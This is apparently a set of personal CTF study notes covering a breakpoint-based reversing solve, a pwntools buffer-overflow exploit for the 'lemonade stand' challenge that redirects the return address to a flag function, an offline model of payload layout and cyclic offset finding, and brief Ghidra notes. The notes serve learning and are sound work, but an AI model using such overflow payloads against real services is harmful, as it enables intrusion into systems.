PWN+Reversing_Insights.md

PWN and reversing are their own separate categories, but they overlap with DFIR, and knowing how to do them develops skills that help in DFIR.

Breakpoints

The HTB hacktheboo2023 CTF had a rev challenge called ghost in the box. It was a very easy challenge: essentially the only thing needed was to set a breakpoint.

Running the program first, we see that it prints corrupt output.


Disassembling main, notice the call to getflag at +143 and the call to ghost at +155.


The first intuition is that the ghost function overwrites and scrambles what getflag produced. To check this, we can set a breakpoint between the getflag and ghost calls.


At that breakpoint we can see the flag intact in the registers.


Buffer overflow + pwntools

The HTB hacktheboo2023 pwn challenge called lemonade stand. Notice a buffer overflow that allows control of rip, and a function called grapes that prints the flag. The exploit is executed with pwntools.


Grapes


Complete pwntools script


```python
from pwn import *

# Set up pwntools for the correct architecture
context.arch = 'amd64'
context.log_level = 'critical'

# Load the local copy of the binary so pwntools can resolve the function's address from its symbol table
fname = './lemonade_stand_v1'
e = ELF(fname)

# Address of the 'grapes' function as read from the disassembly
# Notice that p64(grapes_mem) == p64(e.sym.grapes): the symbol lookup yields the same bytes as the hand-written retn below
grapes_mem = 0x00000000004008cf
print(hex(grapes_mem), p64(e.sym.grapes))


# Connect to the server
target_host = '94.237.59.206'  # replace with the target IP address
target_port = 38999            # replace with the target port number
r = remote(target_host, target_port)

# Payload crafting
offset = 94                    # bytes from the start of the buffer to the saved rbp
padding = b'A' * offset
rbp = b'B' * 8                 # overwrites the saved rbp
# Hand-written little-endian return address; this must be bytes, not str, or pwntools will re-encode it
retn = b'\xcf\x08\x40\x00\x00\x00\x00\x00'

# Interacting with the program: walk the menu up to the vulnerable input
r.recvuntil(b'>> ')
r.sendline(b'2')
r.recvuntil(b'>> ')
r.sendline(b'2')
r.recvuntil(b'>> ')
r.sendline(b'1')
r.recvuntil(b'>> ')
r.sendline(b'1')


# Finalizing the payload
# payload uses the hand-written return address, payload2 uses the address resolved from the ELF symbol
payload = flat([padding, rbp, retn])
payload2 = flat([padding, rbp, p64(e.sym.grapes)])

# Sending the payload
# Uncomment whichever choice

#r.sendline(payload)
r.sendline(payload2)

# Keep the connection alive to see any potential outputs or to interact further
r.interactive()
```


Output of running the final pwntools script


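The script above hard-codes two numbers, the 94-byte offset and the return address 0x4008cf, without showing where they come from. The following is an added example, not part of the original notes or of the challenge files: a standard-library model of the payload layout (padding, fake saved rbp, return address) and of the cyclic-pattern method used to find where the return address slot sits. It assumes an amd64 little-endian target without PIE, the page's offset of 94 and grapes address 0x4008cf; the "stack frame" it overflows is a constructed toy, not the real binary, so it runs offline without pwntools.

```python
# Added example (not from the original notes): model of the lemonade stand
# payload layout and of how the offset to the return address is recovered.
# Assumptions: amd64, little-endian, no PIE; OFFSET and GRAPES_ADDR come from
# the page; the frame layout below is a constructed toy, not the real program.
import itertools
import struct

GRAPES_ADDR = 0x4008CF   # address of grapes, from the page's disassembly
OFFSET = 94              # bytes from the start of the buffer to the saved rbp (page value)
SAVED_RBP_SIZE = 8       # saved frame pointer sits between the buffer and the return address
RET_SIZE = 8             # size of the return address slot


def p64(value):
    """Pack a 64-bit little-endian integer, the same bytes pwntools' p64 gives on amd64."""
    return struct.pack("<Q", value)


def u64(data):
    """Inverse of p64."""
    return struct.unpack("<Q", data)[0]


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield a De Bruijn sequence B(k, n): every n-byte window occurs exactly once.
    This is the idea behind pwntools' cyclic(); implemented here with the
    standard FKM recursion so nothing outside the standard library is needed."""
    k = len(alphabet)
    a = [0] * (k * n)

    def gen(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from gen(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from gen(t + 1, t)

    yield from gen(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern (like pwntools cyclic(length))."""
    return bytes(itertools.islice(de_bruijn(), length))


def cyclic_find(chunk, max_length=4096):
    """Offset of a 4-byte chunk inside the pattern (like pwntools cyclic_find)."""
    return cyclic(max_length).find(chunk[:4])


def simulate_overflow(data):
    """Toy model of the vulnerable frame: buffer[OFFSET] | saved rbp | return address.
    Returns the 8 bytes that land in the return-address slot, or None when the
    input is too short to reach it. Constructed model, not the challenge binary."""
    ret_start = OFFSET + SAVED_RBP_SIZE
    if len(data) < ret_start + RET_SIZE:
        return None
    return data[ret_start:ret_start + RET_SIZE]


def find_ret_offset():
    """Feed a cyclic pattern to the toy frame and read back which part of the
    pattern reached the return address: this is how offset = 94 is derived
    (the slot is at 94 + 8, after the saved rbp)."""
    crashed = simulate_overflow(cyclic(200))
    return cyclic_find(crashed)


def build_payload(ret_addr, offset=OFFSET):
    """padding | fake rbp | return address, matching flat([padding, rbp, retn])."""
    return b"A" * offset + b"B" * SAVED_RBP_SIZE + p64(ret_addr)


if __name__ == "__main__":
    print("hand-written retn equals p64(grapes):",
          p64(GRAPES_ADDR) == b"\xcf\x08\x40\x00\x00\x00\x00\x00")
    print("return address slot starts at pattern offset", find_ret_offset())
    landed = simulate_overflow(build_payload(GRAPES_ADDR))
    print("value in the return address slot:", hex(u64(landed)))
```

The fixed address only works because the binary is not position independent; with PIE and ASLR the address of grapes changes on every run, and a stack canary would abort the process before the overwritten return address is ever used. Checking those three properties (PIE, canary, NX) is the first thing to do when triaging a binary like this, whether as attacker or as the person reviewing its build flags.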
Notes from Reversing with Ghidra

https://youtu.be/Y2qd0m4_4ZM?si=E65mh0bnvHduyUKw

Loops

x86_64-w64-mingw32-gcc loop_prac.c -o loop_prac.exe

The flow chart view is useful for identifying loops.


Right-click to rename variables and to switch the hex/decimal representation of values.
